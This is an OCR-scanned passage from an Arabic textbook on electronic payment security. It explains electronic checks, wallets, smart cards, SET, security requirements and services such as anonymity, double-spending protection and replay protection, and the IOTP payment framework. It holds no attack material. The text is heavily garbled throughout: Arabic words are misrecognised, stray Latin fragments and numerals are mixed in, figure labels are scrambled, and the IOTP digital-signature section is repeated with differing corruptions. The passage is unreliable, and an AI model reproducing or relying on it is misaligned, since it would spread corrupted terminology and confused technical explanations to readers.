تعامل دفع شيك الکترونی‎ : (Lor) شکل‎ 
را‎ (Y) EEEN Acquirer 
Bank soiree 0 an 
(1) ‚Mterbarik (clearing) network ب‎ 
& 5 58 4 Settlement 
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2 Signed check 
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Merchant 


(Payer (A) 5 TT (Payee) O°) 
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الحافظة الالكترونية : 

الحافظة الالكترونية (electronic wallets)‏ عبارة عن آدوات أجزاء صلبة أو پرامج 
قيمة Opt‏ . . ویمکن تحميلها بقيمة محددة إما بزيادة عداد عمله أو باختزان صفوف 
آرقام ثناتية (bit strings)‏ « وقثل عملات الكترونية . اتجاه التکنولوجیا احالية هو انتاج 
حوافظ الكترونية بتکنولوجیا بطاقة ذكية . فى نظام الدفع الالکترونی الطور فى 
مشروع die . (Conditional Access for Europe) CAFE‏ بواسطة برنامج 
(European Community ( ESPRIT‏ » فإن الحوافظ الالكترونية يمكن أن تكون فى 
شکل حاسب الى صغير محمول بمصدر تغذية داخلى e (I-wallet)‏ أو فى شكل بطاقة 
ذكية (a-wallet)‏ ]7[ . ويمكن تحميل النقود الالكترونية داخل الحوافظ المركزية 
(online)‏ وتستعمل للدفع عند آطراف نقط ال_بيع . 
البطاقات الذكية : 

البطاقات الذكية (smart cards)‏ عبارة عن بطاقات من البلاستيك . 

لعدة سنوات الآن » فان الحوافظ الالكترونية المؤسسة على البطاقات الذكية » 
والتى هى فى الحقيقة بطاقات ( مسبقة الدفع ) قيمة مختزنة ويعاد حمیلها e‏ 
قد استعملت أساسًا للدفع الصغیر للنقود . حساب مالك الحافظة مديون 
قبل عمل أى مشتروات . ویمکن للمالك أن يخمل البطاقة فى آل ةمقل 
ATM‏ . المحلات التى تقبل هذا النوع من الدفع يجب أن تكون مزودة 
بقاریء بطاقء مقابل عند الدفع ( الخزينة ) والأمثلة هی Austrian Quick‏ 
و Proton‏ . 

المثال الآحر لاستعال البطاقات الذكية فى التجارة الالكترونية (e-commerce)‏ 
(Secure Electronic Transactions) SET : ya‏ أى التعاملات الالكترونية EN‏ 
وهی مواصفات مفتوحة لتعاملات بطاقة ANO‏ عبر الشبكات المفتوحة (8). فى 
الحالة الحاضرة (SET)‏ » فان العميل ( أى مالك البطاقة ) clit‏ لتطبيق حافظ بطاقة 
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. ) مركب عليه » مثل 50 المنزلى الخاص به ( أى حاسبة الآلى الشخصى المنزل‎ SET 
تقدم بطاقة ذاكية يمكنها الاتصال بتطبيق‎ As العتمدة‎ SET ومجموعة إمتدادات‎ 
. حافظ البطاقة » حيث أن بطاقات كثيرة مصنوعة بتكنولوجيا البطاقة الذكية فعلا‎ 
. SET وبهذه الطريقة فإنها ستتكامل بسهولة داخل‎ 


أمن الدفع الالكترونى : 

مشكلة الأمن لنظم الدفع التقليدى معروفة جيدًا : 
© النقود يمكن تزييفها . 
© التوقيعات يمكن تقليدها وتلفيقها . 


© الشيكات يمكن إرتدادها . 
نظم الدفع الالكترونية بها نفس المشاكل مثل النظم التقليدية وأكثر : 
© الوثائق الرقمية يمكن نسخها بدقة وكثيرا عشوائيًا . 
© التوقيعات الرقمية يمكن إنتاجها بواسطة أى شخص يعرف المفتاح الخاص . 
© هوية الدافع يمكن أن تصاحب مع كل تعامل دفع . 
ومن الواضح آنه» بدون إجراءات أمن إضافية » فإن التجارة الالكترونية ذات 
أن يعطى أمن أفضل من النظم التقليدية للدفع » بالإضافة لمرونة الاستعمال . 
عمومًا » فى نظام الدفع الالكترونى » يمكن مواجهة ثلاثة أنواع من الاعداء ; 
© الأجانب الذين يتنصتون على خط الاتصالات ويسيؤون إستعال البيانات المجمعة 
(مثل أرقام بطاقات الاثتمان ) . 
© المهاجمون النشطون الذى يرسلون رسائل ملفقة للمشاركين فى نظام الدفع القانونیین 
لغرض منع النظام من العمل أو لسرقة الأشياء المتبادلة (البضائع أو النقود) . 
© المشاركون فى نظام الدفع الغير شرفاء الذين يحاولون الحصول على » أو إساءة 
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استعمال بيانات تعامل الدفع والذين ليس شم الحق فى أن يروا أو یستعملوا . 

إحتياجات الأمن الأساسية لنظم الدفع الالكترونى يمكن تلخيصها كما یل ; 
«jr 9‏ 
0 تكامل دفع . 
© توثيق دفع . 

توثيق الدفع (payment authentication)‏ يدل على أن كلا الذين يدفعون وكذلك 
الذين يتم الدفع هم يجب أن يبرهنوا على شخصية الدفع لهم . وإذا لم يكن مطلوب 
إغفال » فإنه يمكن استعمال إحدى آليات التوثيق لتحقيق هذا الطلب . . وليس من 
الضرورى أن يدل التوثيق على أن كيئونة الدافع تكون مكشوفة أى معروفة . وإذا كان 
مطلوب اغفال الاسم » فإن بعض آليات التوثيق تكون مطلوبة . 

تكامل الدفع يحتاج أن بيانات تعامل الدفع لا يمكن أن تكون قابلة للتعديل 
بواسطة أشخاص ليس م الحق فى ذلك . . بيانات تعامل الدفع تتضمن شخصية 
الدافع » EAN er‏ وعتوی الشواء 3 والكمية ومن الحتمل معلومات احری 4 
لهذا الغرض فإن الية تكامل من مجال أمن المعلومات قد تستعمل . 

توكيل الدفع يؤكد أنه لا يمكن del‏ نقود من حساب عميل أو بطاقة ذكية بدون 
موافقة محددة . فهو يعنى أيضًا أن كمية المسموح به صراحة يمكن سحبها بواسطة 
الأمن . 

خصوصية الدفع تغطی خصوصية واحدة أو أكثر لبيانات تعامل الدفم ۰ وق أبسط 
الحالات يمكن الوصول AU‏ باستعيال واحدة من آلیات خصوصية الاتصالات . وى 
بعض CVU‏ » فمن المطلوب من كل قطعة من بيانات التعامل أن تظل سرية عن 
ختلف المشاركين فى نظام الدفع . وتلك التطلبات يمكن تحقیقها بآلية أمن دفع محددة 
ومجهزة Lanas‏ . 
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الباب الثالث 





Payment Security 
Services 


: خدمات أمن الدفع‎ 
Payment Security Services 

حتى نلبى إحتياجات الأمن AIS‏ وذلك لنظام دفع الكترونى ۰ فمن الضروری عمل 
خدمات أمن إضافية والتى تختلف عن خدمات أمن الاتصالات » وفى هذا الباب e‏ فان 
هذه الخدمات الجديدة معرفة . وتنتج التعريفات من تعميم وسائل أمن الدفع 
المستعملة فى نظم الدفع الالكترونية الوجودة . 

وهذا الجزء يعطى تصنيف مبسط لخدمات أمن الدفع الستعملة بالاضافة لخدمات 
أمن المعلومات الاساسية . بعض أنواع خدمات أمن الدفع كانت مطورة أساسًا لأنواع 
مختلفة لخدمات الشبكات مثل المحاسبة فى نظم موزع ( مثل ly . ( Kerberos‏ 
خدمات أمن دفع تم تنفيذها حقيقة » فهذا يعتمد على سياسة أمن نظام الدفع . ومثل 
ما هو مع سياسات أمن المعلومات » OP‏ تطوير سياسة أمن دفع يبدأ دائما بتحليل 
حاطرة . SU‏ » فمثلا » نظام دفع الكترونى لتعاملات تتضمن كميات ins‏ من 
النقود يحتاج لسياسة أمن معقد أكثر وبالتالى أكثر تكلفة كسياسة أمن عن نظام دفع 
دقيق والذى فيه قيم صغيرة ( حتى خمسة يورو ) يتم ols‏ . وبناء على ما هو الذى يتم 
حمايته » فان خدمات آمن المعلومات وواحد أو أكثر من خدمات الدفع التالية يمكن 
تنفيذها. ومن الضرورى التحقق أن نظام الدفع قد يكون له إحتياجات أمن متضاربة . 
Hass‏ فقد يحتاج أن تكون العملات الرقمية بدون مسمى » ولكن فى نفس الوقت 
cle‏ تحديد العملاء الذين يحاولون صرف تلك النقود بازدواج . لذلك » فلا يوصى 
بجمع الآليات المذكورة فى هذا الكتاب بدون الأحذ فى الاعتبار التقاطع الممكن بينها . 

التصنيف التالى مبنى على تحليل نظم دفع الكترونية تجريبية أو تجارية موجودة . 
وكل نظام دفع الكترونى له مجموعة محددة لاحتياجات الامن » وبالتال مجموعة 
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محددة لخدمات الأمن واليات أمن من نظام دفع الكترونى موجود لكل من خدمات 
الامن الى Wee‏ 
وتلك الأجزاء ستركز على شرح أسس وسائل أمن الدفع بدلاً من إعطاء استعراض 
كامل لنظم الدفع الالكترونية التجارية . واستعراض عدد من نظم دفع التجريبية 
والالكترونية التجارية ستذكره . 
خدمات أمن الدفع تقع فى ثلاثة مجاميع أساسية بناء على جهاز الدفع الستعمل . 
المجموعة الأولى ترجع لكل أنواع نظم الدفع الالكترونية وكل أجهزة الدفع . 
الخدمات من المجموعة الأولى يشار إليها كخدمات أمن تعامل الدفع (payment‏ 
transaction security)‏ . 
© إغفال إسم الستخدم (user anonymity)‏ : يحمى ضد كينونة المستخدم فى تعامل 
شبكة . 
© عدم تتبع الموقع (location untraceability)‏ : بحمى ضد إفشاء شخصية الدافع 
فى تعامل دفع . 
© عدم تتبع تعامل للدفع (payment transaction untracebieity)‏ : مى ضد 
الوصلة بين تعاملين مختلفين للدفع يتضمنان نفس العميل . 
© خصوصية بيانات تعامل الدفع (confidentiality of payment transaction‏ 
data)‏ : تحمى بانتقائية ضد كشف أجزاء محددة لبيانات تعامل دفع الأسس منتقاة 
من جموعة الأشخاص المؤهلين . 
© رسائل رفض تعامل الدفع : Nonrepudation of payment transaction mes-‏ 
sages)‏ : يحمى ضد انكار مصدر رسائل البروتوكول فى تعامل دفع . 
© حداثة رسائل تعامل الدفع : (Freshness of payment transaction messag-‏ 
es)‏ باستعمال النقود الرقمية كجهاز دفع . ويشار إليها كأمن النقود الرقمية . 
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© حماية ضد الصرف المزدوج : يمنع الاستعمال المتعدد للعملات الالكترونية . 
© حماية ضد تزييف العملات : يمنع إنتاج العملات الرقمية الزيفة بواسطة شخص 
غير مسموح له . 
dle ©‏ ضد سرقة العملات : تمنع صرف العملات الرقمية بواسطة شخص غير 
مسموح له. 
الجموعة الثالثة للخدمات مؤسسة على وسائل محددة لنظم دفع باستعمال شيكات 
الكترونية كأجهزة دفع . وتوجد خدمة إضافية طبيعية للشيكات الالكترونية : 
© نقل تفويض الدفع ( وكالة ( : [ [payment authorization transfer (proxy)‏ 
Jat‏ من الممكن نقل توكيل الدفع من الشخص المصرح له لشخص آخر بواسطة 
الشخص المصرح له . 
آمن تعامل الدفع : 
الخدمة التی تحمی إغفال اسم الستخدم ليست محددة فى الحقيقة لنظم الدفع 
الالكترونى فقط » ولكن يمكن تطبيقها على أى نوع لخدمة الشبكة . فمثلاً » قد يرغب 
المستخدم أن يرسل بريد الكترونى أو شراء بضائع على الانترنيت باغفال الاسم . . 
عدم تتبع الموقع يرجع لأغفال اسم شبكة المستخدم . لنفترض أن شخصية الستخدم 
والذى أرسل بريد إلكترونى باغفال الاسم لم يبح لمجال الراسل (أو «(Form‏ ولكن 
عنوان 12 أو إسم المضيف للحاسب الا الذى أرسله منه معروف . وفى تلك الحالة 
Ob‏ جموعة الراسلين المحتملين يمكن تضيقها غالبًا إلى عدد أشخاص قليلين فقط » أو 
> لشخص واحد محدد إذا كان الحاسب الآلى هو PC‏ منزل الراسل . لذلك» فان 
عدم تتبع الستخدم يؤكد أن عنوان PCs IP‏ أو سم المضيف لا يمكن البوح به . 
وحيث أن تعامل الدفع الالكترونى يحدث فى شبكة إتصالات » فإن إغفال إسم الدافع 
يرجع بقوة إلى إغفال إسم المستخدم . وإغفال إسم المستخدم عبارة عن خدمة 
تستعمل بين شريكى إتصالات . ويجب أن يحفظ أثناء دورة الاتصالات . إغفال إسم 
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الدافع » يجب أن Bie‏ خلال التعامل كله » والذى قد يتضمن دورات متعددة. 
وتحدث دورة واحدة » مثلا بين العميل والتاجر » وواحدة بين التاجر والبنك المستفيد» 
وواحدة بين البنك المستفيد وبنك الدافع ‏ انظر شكل ( ١  ”‏ ) . ومن المطلوب sale‏ 
أن يكون الدافع مغفول الاسم فى كل دورة [eb‏ عدا بعض الدورات مع البنك الخاص 
به . وبمعنى اخر » فإن إغفال إسم الستخدم مثل عدم تتبع الموقع هو شرط JUEN‏ 
إسم الدافع » ولكن إغفال إسم الدافع قد يتضمن بعض الآليات الاضافية . 

ويمكن أن يكون الدافع باسم مغفول بطريقة بحيث أنه يختبىء (hides)‏ خلف إسم 
مستعار أو ID‏ رقمى . وإذا استعمل نفس GID‏ كل تعاملات الدفع » فان تعامله 
يمكن مراقبته » وبمصاحبة بعض العلومات الاضافية » فان شخصيته تستخلص . 
ودور عدم تتبع تعامل الدفع ليس بعيدًا عن الربط بين تعاملات الدفع التى تتضمن 
نفس الدافع . خصوصية بيانات تعامل الدفع تکافیء خصوصية الاتصالات السابق 
ذكرها . کذلك  op‏ هذه الخدمة تغطى أيضًا حالات أكثر تعقيدًا والتى فيها بيانات 
تعامل الدفع يتم حمايتها من أن تكشف للأجانب » وكذلك أيضًا فإن الأجزاء النتقاة 
للبيانات يتم Yule‏ من أشخاص معينين ( مثل القائمين بالدفع ) . وكمثال » نفترض 
أن البيانات تتضمن الجزء 2 » 0 ومجموع الأشخاص المسموح شم تحتوى على شخصين 
۸ . الخصوصية للبيانات يمكن حمايتها بطريقة ما بحيث : 
© لايمكن لشخص فی| عدا A‏ .8 قراءة أى جزء للبيانات . 
© ۸ يمكنه قراءة الجزء a‏ فقط . 
© 8 يمكنه قراءة الجزء ا فقط . 

وفى نفس الوقت ۰ تكامل البيانات يحفظ » وعندما يحدد تعامل الدفع الالكترونى 
بواسطة واحد أو عديد من بروتوكولات الشبكة . والبروتوكول يتضمن مجموعة من 
الرسائل يتم تبادها بين شخصين . عدم شهرة المصدر هو نوع من أمن المعلومات 
والذى يمنع الراسل الذى ينكر أنه ولد رسالة مستقلة بواسطته . ويمكن التنفيذ بآلية 
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توقيع رقمى . وف تعامل الدفع الالكترونى » فان الأشخاص هم العميل » والتاجر » 
وإطار الدفع والبنك . ويمكن أن Lag‏ النزاع إذا ذكر العميل أنه لم يوزع بتانًا تعلييات 
دفع أو التاجر یذکر أنه لم يتسلم بتانًا أى دفع من العمیل . خدمة شهرة رسائل تعامل 
دفع تساعد فى حل النزعات . 

لتأكيد حداثة رسائل تعامل الدفع يعنى حماية ضد إعادة إستعمال » مثل رسائل 
تعلیمات الدفع . وإذا أرسل عميل معلومات بطاقة الائتمان الخاصة به كدفع » فان 
الرسالة حتى فى الشكل الشفر يمكن التقاطها بواسطة متطفل ويعاد Blain]‏ بعد 
ذلك بواسطة شخص عدوانى بدون معرفة العميل . . وهذا مثال هجوم إعادة عرض . 
أمن النقود الرقمية : 

لسوء الحظ » فان إغفال الاسم يجعل من السهل الغش بدون القبض de‏ 
الشخص . فمثلا » فإن العملة الرقمية المجهولة فى الاسم كلية عبارة عن صف رقم 
ثنائى فقط يمكن نسخه مرات كثيرة حسب الرغبة » حتى إذا كشف بنك أن شخص ما 
حاول صرف نفس العملة أكثر من مرة واحدة » فمن المستحيل كشف هذه 
الشخصية. OY‏ العملة مجهولة . وفى تلك الحالات e‏ فان خدمة SAI‏ ضد الصرف 
الزدوج قد تساعد هذه الخدمة يمكن أن تؤسس على الغفلة المشروطة (conditional‏ 
anonymity)‏ < والشرط هو أنه إذا كان العميل أمين ويصرف العملة مرة واحدة فقط » 
فإن شخصيته لا يمكن إدراكها . وإذا حاول أن يعمل صرف مزدوج » فيمكن تحديده 
ويتم جعله مسئولا واقعيًا . 

(bit stri- سبق وذكرنا » فان العملات الرقمية عبارة عن صفوف أرقام ثنائية‎ (Ss 
وإذا لم يلب صف أرقام ثنائية لعملة خواص محددة » أو إذا كانت الخواص‎ . ngs) 
بسيطة أى أنه من السهل توليد كثير من صفوف الارقام الثنائية والتى تحققها » فان‎ 
عملات مقبولة ( مزيفة ) يمكن إنتاجها بواسطة أى شخص . وف نظام الدفع الغير‎ 
مرکزی» فلا توجد إمكانية التحقق فى وقت فعلى إذا ما كان صف الأرقام الثنائية قد تم‎ 
إصداره بواسطة وسيط قانونى . والنتيجة  أن نظم الدفع الغير مركزية يجب أن تكون‎ 
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ها بعض الخواص ضد العملات المزيفة . حيث أن صفوف الارقام الثنائية والعملات 
الرقمية یمکن سرقتها بسهولة ( يتم التقاطها بواسطة مسترقی السمع ) إذا لم تكن 
مشفرة. وإذا كان القائمون UL‏ مغفولى الاسم » فلا توجد طريقة للمستفید 
للمفاضلة بين مالك قانونی ولص یستعمل العملات السروقة . ومع ذلك » توجد 
بعض الآليات لنع سرقة العملات » وتستعمل لتنفيذ خدمة آمن الدفع القابل . 

الخدمات BO‏ لأمن النقود الرقمية والسابق ذکرها متضاربة لحد ما » ولکن توجد 
طرق لتنفيذها بحیث یوجد مدی بين الخاطرة والحاية . فمثلاً » يمكن تبيئتها لأن يتم 
تزنيدها إذا حدث شىء غير قانونى فقط ( مثل إغفال إسم مشروط ) . 
أمن الشيك الالکتسرونی : 

عندما نعطی شيك لشخص ما » فنحن فى الحقيقة نعطی توکیل للشخص Ob‏ 
يسحب بعض النقود من حسابنا البنکی وبالشيك الورقی ۰ فان ذلك التوکیل يؤكد 
بتوقیع بالید . وبالة الدفع الالکترونی ۰ فان التوکیل يجب أن يتم رقميًا » والذی یکون 
[SE‏ بخدمة JE‏ توکیل الدفع . 
التسوضر والعسول : 

بجانب الاحتیاج OL‏ نکون آمنین » فإن نظام الدفع الالکترونی يجب أن يكون متاحًا 
(available)‏ ويعتمد عليه (reliable)‏ . فيجب أن یکون متاحًا فى کل وقت » سبعة 
أيام فى الاسبوع ؛ وأربعة وعشرین ساعة فى اليوم . کذلك ۰ يجب أن یکون له بعض 
Al‏ ضد هجوم انکار الخدمة e (denial-of-service)‏ أو على الأقل أن يكون ho‏ 
أن يكشفها مبكرًا والبدء بإجراءات الشفاء . 

ولتأكيد العول (reliability)‏ » فان تعاملات الدفع يجب أن تكون ذرية . وهذا 
يعنى أنها تحدث ما كلية ( ناجحة كلية ) أو ليس ذلك بالمرة » ولکن لا تعلق Gly‏ فى 
حالة غير معروفة أو غير قوية . 

بالإضافة لذلك » فان خدمات الشبكات الأساسية وكذلك كل قطع البرامج 
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والأجزاء الصلبة يجب أن يعتمد عليها بدرجة كافية . وهذا یمکن إتمامه بإضافة فائض 
(أى عمل إزدواج لقطع النظام الحرجة) > لأى وظيفة بخرج ۳ لعدد n‏ عند التعدد. 
فمثلاً » ito‏ إصدار cme‏ فإنه على الأقل عدد « يجب أن توافق على نتيجة ob‏ تقبل 
بواسطة النظام على آنها صحيحة . الفائض الديناميكى للشبكة » فإن كشف خطأ فى 
قطعة واحدة سيسبب نقل التوصيل لقطعة فائضة į‏ وهذه الوسائل شائعة لكثير من 
نظم البرامج والأجزاء الصلبة . بالاشافة لذلك » فان العول يحتاج آليات تفاوت عطل 
عدده . تتضمن اختزان مستقر وبروتوكولات إعادة تزامن للشفاء من الصدام 5 
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الباب الرابع 
اطار دفع إلكترونى 


An Electronic 
Payment Framework 


: إطار الدفع الالکترونی‎ 
An Electronic Payment Frameworlz 

سبق أن شرحنا Hes‏ من آليات الأمن الحددة لنظم دفع مختلفة . وكل نظام دفع 
يعرف رسائله وله إحتياجاته الخاصة به للأمن . ومع ذلك » فإن أحد الأشياء الأساسية 
فى الانترنيت هى إمكانية الإجراءات المتبادلة (interoperability)‏ . وإحدى الطرق 
للوصول لهذا هى تعريف مستوى أعلى للتجريبية (abstraction)‏ « أى إطار دفع 
إلكترونى مشترك يحدد مجموعة من البروتوكولات والتى يمكن Uli‏ مع أى نظام 
دفع . ومع أن نظم دفع كثيرة Lis‏ الأمن الخاصة بها عند مستوى الاطار . 
وهذه هی الفلسفة لبروتوكول إطار الدفع (101۳) والمذكور فى هذا الباب . 
بروتوكول التجارة المفتوح فى الانترنيت AOTP)‏ : 

بروتوكول التجارة المفتوح فى الانترنيت (The Internet Open trading Protocol)‏ 
عبارة عن إطار دفع إلكترونى لتجارة الانترنيت والذى مهدف AS‏ الإجراءات 
المتبادلة بين نظم دفع مختلفة . 

وحتى الآن » فهو لا زال فى حالة تطوير ( عبارة عن مسودة إنترنيت أى وثيقة عمل 
والتى تنتهی صلاحيتها بعد ستة شهور ) . مجموعة عمل IETF‏ والستولة لها نفس 
الاسم WG)‏ 57 وتنتمى لمجال تطبيقات 15۲۴ . المشترك فى ۰1071۳ يمكنه أداء 
واحد أو عديد من الأدوار التجارية : مستهلك e‏ أو تاجر أو مناول دفع أو مناول 
تسليم أو تاجر أو مزود إستشارة للمستهلك فى نفس الوقت . والبروتوكول الذى يصف 
المحتوى والنسق وتتابع رسائل التجارة الإلكترونية والتى تمر بين المشتركين . 
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e SET عن نظام الدفع > وهذا يعنى أى نظام دفع إلكترونى ( مثل‎ fi IOTP 
يمكن استع‌اله خلال الاطار . وكل نظام دفع يعرف مسارات رسائل‎ ( Digi Cash 
محددة الأجزاء والحددة لنظام الدفع للبروتوكول توجد فى مجموعة إضافات مشاريع دفع‎ 
TOTP لمواصفات‎ 


رسائل 10۳1 عبارة عن وثائق XML‏ بتشکیل جید (Extensible Markup Lan-‏ 
guage).‏ . الجموعة المعرفة Cig’‏ لرسائل 101۳ تعرف تبادل تجارى ( trading‏ 
(exchange‏ أى عرض . أو دفع أو تسلیم أو توثيق تعاملات 1017 مبنية من واحد 
أو أكثر للتبادل التجارى . العامل قد يكون أنواع مختلفة مثل شراء » أو إعادة تمويل أو 
توثيق . 

شكل (5 )١-‏ يبين ISA‏ العام لرسالة 10۳1 . فهو يحتوى على قوالب (blocks)‏ 
متعددة . وكل رسالة SEU‏ مرجع تعامل ( عبر قالب مرجع ) ۰ والذى يحدد عامل 
1 . التعامل ( مثل شراء » وتوثيق » وسحب ۰ وإيداع ) له محدد تعامل شامل 
(Trans Id)‏ . فهو يتضمن رسالة واحدة أو ¿SÍ‏ من مجموعة محددة مسبقًا » وكل 
الرسائل التى تنسب لنفس التعامل لما نفس المحدد Trans Id‏ . بالإضافة UA‏ » كل 
رسالة ما محددها Msg Id‏ والمتفرد خلال التعامل . وتحتوى رسالة واحد أو أكثر 
لقوالب تجارية (trading blocks)‏ « مثل توثيق طلب / استجابة أو دفع طلب / 
إستجابة . خياريًا » يمكن أن يحتوى على قالب توقيع (قالب تجارى أيضًا) . قالب 
التوقيع يحمل توقيع رقمى للقوالب التجارية أو قطع تجارية» وخياريًا شهادات المفاتيح 
العامة لتحقيق التوقیم . أخيرًا » القالب التجارى يحتوى على مجموعة القطع التجارية 
العرفة مسبقًا ( مثل توثيق طلب / إستجابة » مشروع دافع» وإيصال دفع ) . 
مواضيع الأمن : 


معظم نظم الدفع والتى يمكن استع الما خلال إطار WIOTP‏ مفهوم الأمن الخاص 
بها فعلا . ومع ذلك » توجد بعض مواضيع أمن والتى تعطيها 10۳۲ لاعطاء حماية 
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إضافية خيارية . فإذا كان من الضرورى أن نأخذ فى الاعتبار أمن الدفع من منظور 
۲ فان هذا سيتضمن فى ملحق بروتوكول الدفع والذى يصف كيف يدعم 





01 بروتوکول الدفع هذا . 
شكل ( ١١4‏ ) رساله IOTP‏ 

(1) | Trans Ref Block 
(Y) Trans Id Component . عبر قالب مرجع‎ (1) 
(Y) | | Msg ld Component . عبر قطعة محدد‎ (5) 

قطعة د رساله 
Signature Block PT (۳‏ | )£( 
)٤‏ قالب التو 3 
(o) Signature Component = a a‏ 
(U Certificate Component ee)‏ 
)1( قطعة شهادة 
(۷) قوالب تجارية . Trading Block(s)‏ | )¥( 
(۸) قطع تجارية (A) Trading Component(s)‏ 
( 


a — 


(4) | IOTP Message 

المشاركون فى 101۳ يمكنهم توثيق بعضهم البعض خلال تبادل توثيق . ويمكن 
عمل التوثيق عند cl‏ نقطة فى البروتوكول . فهو ببساطة old Gly‏ 1017 ال خالى . 
فمثلاً » فقد يحتاج مستهلك أن يوثق الدفع . والمناول (handler)‏ بعد تسلم إستجابة 
طلب (Offer Response)‏ من التاجر وقبل إرسال طلب الدفع لناول الدفع . 
بروتوكول التوثيق خارج موضوع 101۳ . إذا كان تعامل التوثيق ناجح » فان تعامل 
5 الأصلى یسترجم ‏ وإلا ستلغى . وتعامل التوثيق يمكن توصيله بتعامل TOTP‏ 
الأصلى بواسطة ذو صلة (Related to)‏ قطعة تحتوى على محدد تعامل (Trans IOTP‏ 
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(14تكامل البيانات وعدم إنكار المصدر يمكن الوصول له بواسطة التوقيعات الرقمية . 

فمثلاً » مناول الدفع قد يرغب فى اعطاء برهان عدم إنكار لحالة تكملة لدفع . وإذا 
تم توقيع استجابة دفع » Ob dee‏ الستهلك يمكنه لاحقا إستعال سجل الدفع 
لبرهان أنه حدث . بالإضافة لذلك » من الممكن استعمال التوقيعات الرقمية لربط 
السجلات المحتواة مع بعضها فى رسالة استجابة لكل تبادل تجارى فى تعامل . فمثلاً » 
IOTP‏ يمكنه ربط (Offer) lb‏ ودفع (payment)‏ مع بعضها كما نرى فی الثال 
التال : مركبة التوقيع تحتوى على العناصر التالية : 
© عناصر الانحتيار التى تحتوى تارات لواحد أو أكثر من قوالب التجارة أو LSM‏ 

التجارية فى واحدة أو أكثر لرسائل 107۳( من نفس تعامل (IOTP‏ . 
© عنصر الظهور (manifest element)‏ متضمتا المصدر والمتسلم وخطوات حل 

التوقيع » كلها مسلسلة مع عناصر إختيار . 
[dad ©‏ توقيع عنصر الاظهار . 

خياريًا » فإن شهادة المصدر يمكن أن تضمن فى مركبة الشهادة لنفس قالب 
التوقيع . 

خصوصية البيانات مشروطة بإرسال رسائل 101۳ بين الأدوار التجارية المتعددة 
باستی‌ال قناة آمنة مثل TLS ¿SSL‏ . وإستعمال قناة آمنة خلال 101۳ خیاری . 

مثال للتوقيع الرقمى : 

کا فى شكل ( ٤‏ ۔ ۲ ) ۰ ob‏ تعامل شراء 1017 بسيط يحتوى على تبادل lb‏ 
(Offer)‏ وتبادل دفع (Payment)‏ . ففى Jols‏ الطلب » فان المستهلك ينتقى البنود 
التى يريد شراءها من صفحة شبكة تاجر Me (Merchant's Web)‏ . ويقوم 
المستهلك بملء شكل (form)‏ شبكة ويرسله للتاجر . والتاجر يمكنه الآن أن يرسل 
قائمة لاأجهزة الدفع التى يقبلها فى شكل قالب خيارات بروتوكول تجارية (trading‏ 


EA 


(Brand List compo- حتوی على مركبة قائمة ماركة‎ Protocol Options : TPO) 
أو بروتوكول دفع ( مثل‎ e (Visa! المستهلك ينتقى علامة دفع ( مثل فيزا‎ . nent) 
وكمية من مركبة قائمة الماركة . ويرسل‎ (USD أو عملة ( مثل‎ 0 

إختياره للتاجر فى قالب إختيار eye TPO‏ على مركبة إختيار ماركة . 


شكل ( ١١2‏ ) تعامل شهادة 105۴ 
(Y)‏ 


HTTP Document ($) 
Time ; 
)۱۵( i Brand List (o) 
0 — 


Brand List Selection (4)‏ 
سس اا ا هي 


Offer Response (Y) 
Offer Response Signature (A) 
— ll > 





Payment Request (4) 
Offer Response Signature{ as) 
+ 


[Payment Exchange] av 
ec وک‎ 
Payment Response (VY) 


Offer Response Signature (\Y) 
Payment Receipt Signature EES, 
ee ب‎ A EER, 








(۱) التاجر . )1( المستهلك )1( مناول الدفع . )£( وثيقة .HTTP‏ 
)0( قانمة الار AS‏ . )1( محموعة قائمة العلامة التجاریه . (Y)‏ استجابه الطلب . 
(A)‏ توقبع استجابة الطلب . (9) طلب دقع . (۱۰) and gi‏ إستجابة الطلب . . 
)١١(‏ تیار الدفع . (Ir)‏ استجابة الدفع . (۱۲) توقیع استجابة الدفع . )٠١(‏ توقیع تسلیم الدفع . 
فى هذه الحالة » فان تکامل مرکبات إنتقاء الماركة Brand Selection Compo-‏ 
nents)‏ لیس مضمونا . وتعدیلها یمکن أن يسبب آنکار الخدمة فقط إذا كان بروتوکول 
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(10تکامل البيانات وعدم إنكار المصدر يمكن الوصول له بواسطة التوقيعات الرقمية . 
فمثلاً » مناول الدفع قد يرغب فى اعطاء برهان عدم إنكار لحالة تكملة لدفع . وإذا 
تم توقيع استجابة دفع » حينئذ فان الستهلك يمكنه لاحقًا إستعمال سجل الدفع 
لرهان أنه حدث . بالإضافة AU‏ » من الممكن استعمال التوقيعات الرقمية لربط 
السجلات المحتواة مع بعضها فى رسالة استجابة لكل تبادل تجارى فى تعامل Rad.‏ 
IOTP‏ يمكنه ربط طلب (Offer)‏ ودفع (payment)‏ مع بعضها کا نرى فى الثال 
التال : مركبة التوقيع تحتوى على العناصر التالية : 
© عناصر الاختيار التى تحتوى مختارات لواحد أو أكثر من قوالب التجارة أو LSM‏ 
التجارية فى واحدة أو أكثر لرسائل 10:77( من نفس تعامل OTP‏ . 
© عنصر الظهور (manifest element)‏ متضمتا المصدر والمتسلم وخطوات حل 
التوقيع » كلها مسلسلة مع عناصر إختيار . 
© قيمة تمثل توقيع عنصر الاظهار . 
خياريًا » فإن شهادة الصدر يمكن أن تضمن فى مركبة الشهادة لنفس قالب 
التوقیع . 
خصوصية البیانات مشروطة بارسال رسائل 101۳ بين الادوار التجارية التعددة 
باستعال قناة آمنة مثل TLS SSL‏ . و (ستع‌ال قناة آمنة خلال 107۳ خباری . 
مثال للتوقيع الرقمی : 
کا فى شکل )8 ۲ ) ۰ فان تعامل شراء OTP‏ بسيط محتوی على تبادل طلب 
(Offer)‏ وتبادل دفع (Payment)‏ . ففى تبادل الطلب « فان الستهلك ینتقی البنود 
التى يريد شراءها من صفحة شبكة تاجر Site (Merchant's Web)‏ . ویقوم 
المستهلك بملء شكل (form)‏ شبكة ويرسله للتاجر . والتاجر يمكنه الآن أن يرسل 
قائمة لأجهزة الدفع التى يقبلها فى شكل قالب خيارات بروتوكول تجارية (trading‏ 


EA 


(Brand List compo- يحتوى على مركبة قائمة ماركة‎ Protocol Options : TPO) 
أو بروتوكول دفع ( مثل‎ » (Visa: المستهلك ينتقى علامة دفع ( مثل فيزا‎ . nent) 
وكمية من مركبة قائمة الماركة . ويرسل‎ (USD أ أو عملة ( مثل‎ 0 
. على مركبة إختيار ماركة‎ ss TPO إختياره للتاجر 3 قالب إختيار‎ 

شكل ( ١.4‏ ) تعامل شهادة 1017 


Payment 


(Y) 


er 
HTTP Document (¢) 
سس هه‎ 
Time ; 
(Yo)! Brand List (o) 
: — > 


Brand List Selection (1) 
A سس‎ 


Offer Response (Y) 
Offer Response پتسا‎ (A) 


Payment Request (4) 
